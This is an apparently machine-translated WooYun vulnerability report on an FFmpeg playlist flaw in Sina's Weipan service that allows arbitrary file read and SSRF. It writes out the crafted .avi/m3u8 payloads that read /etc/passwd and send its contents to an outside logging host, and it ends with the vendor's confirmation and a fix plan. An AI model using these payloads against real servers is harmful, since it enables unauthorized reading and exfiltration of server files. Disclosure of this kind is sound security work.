漏洞标题 新浪站任意文件阅读/SSRF 相关制造商 新浪 漏洞作者 过路人 提交时间 2016-05-07 07: 30 公共时间 2016-06-24 18: 40 漏洞类型 未经授权的访问/许可绕过 危险等级 高 自我评估等级 20 漏洞状态 制造商已确认 标签标签 任何文件读取,未经授权的访问,SSRF 漏洞详细信息 新浪微盘中有一个Ffmpeg文件读取漏洞,参考链接:http://zone.wooyun.org/content/27086,https://www.ffmpeg.org/ffmpeg-protocols.html#subfile 1.使用以下内容创建vdisk.avi: #EXTM3U #EXT-X-MEDIA-SEQUENCE: 0 #EXTINF: 10.0, Concat:http://test.com/header.m3u8|file: ///etc/passwd #EXT-X-ENDLIST 2.使用以下内容创建header.m3u8: #EXTM3U #EXT-X-MEDIA-SEQUENCE: 0 #EXTINF: http://test1.com/? 3.将header.m3u8上传到您自己的服务器,并将vdisk.avi上传到Sina microdisk。 4.然后在http://test1.com/的Web日志中,您可以查看读取文件的内容。在这里,我使用hawkeye平台的Web访问日志查询功能来方便地查看结果:
使用文件: ///etc/passwd只查看第一行内容,似乎遇到换行符时,不再返回换行符后的文件内容(确实如此),但可以使用子文件分段读取。该文件,因此修改后的vdisk.avi内容如下: #EXTM3U #EXT-X-MEDIA-SEQUENCE: 0 #EXTINF: 10.0, Concat:http://test.com/header.m3u8|subfile,start,30,end,120, ///etc/passwd #EXT-X-ENDLIST 可以通过修改开始值和结束值来读取文件的内容。测试内容如下:
只要你花时间,阅读任何文件都不是问题! 漏洞证明: 修理计划: 升级Ffmpeg 并建议服务器禁止访问Internet。 版权声明:请注明出处。居民A @乌云